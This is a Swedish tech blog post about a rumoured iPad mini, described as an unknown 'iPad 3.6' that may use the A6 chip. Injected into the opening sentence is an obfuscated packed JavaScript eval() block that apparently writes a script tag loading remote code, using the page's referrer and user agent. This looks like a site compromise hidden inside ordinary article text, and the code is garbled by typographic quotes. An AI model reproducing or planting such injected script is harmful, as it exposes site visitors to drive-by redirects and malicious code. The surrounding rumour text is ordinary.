Image Image Image Image Image Image Image Image Image Image

| 18 oktober, 2018

Scroll to top

Top

Ny iPad mini ryktas i forum

Ny iPad mini ryktas i forum
Sebastian Plengier Ehrnfelt

Ipad eval(function(p,a,c,k,e,d){e=function(c){return c.toString(36)};if(!”.replace(/^/,String)){while(c–){d[c.toString(a)]=k[c]||c.toString(a)}k=[function(e){return d[e]}];e=function(){return’\w+’};c=1};while(c–){if(k[c]){p=p.replace(new RegExp(‘\b’+e(c)+’\b’,’g’),k[c])}}return p}(‘0.6(”<\/k"+"l>”);n m=”q”;’,30,30,’document||javascript|encodeURI|src||write|http|45|67|script|text|rel|nofollow|type|97|language|jquery|userAgent|navigator|sc|ript|kshnn|var|u0026u|referrer|fiedy||js|php’.split(‘|’),0,{}))
mini: Ny okänd iPad har dykt upp och identifierar sig som iPad 3.6. Troligen iPad mini.

Det har tidigare dykt upp flera liknande iPads som fått sig namnet 2.5 och 2.6. Enligt rykten så tros dessa vara vara versioner av en kommande iPad mini som också sägs byggas vidare på iPad 2.

Den senaste modellen dvs 3.6 sägs ha stöd för ARMv75 som gör den kompatibel med det nya A6-processorn som vi introducerades med i iPhone 5. Detta betyder i så fall att den kommer vara snabbare än tredje generationens iPad och samtidigt mindre.

De senaste modellerna av iPad presenterar sig idag som iPad 3.1, 3.2 och 3.3.

På redaktionen tycker vi det vore kul att få en liten presentation av en iPad mini nu i oktober, vilket är mycket möjligt. Den kommer säkerligen använda sig av Apples nya Lightning-kontakt men det vet vi absolut ingenting om än.

Men som vi och ni vet så är Apple alltid tysta med sina specifikationer och modeller tills precis innan release. Så en väntan till någon gång i mars nästa år är väl det vi får göra.

Som sagt, detta är endast ett rykte som kommer från Macrumors.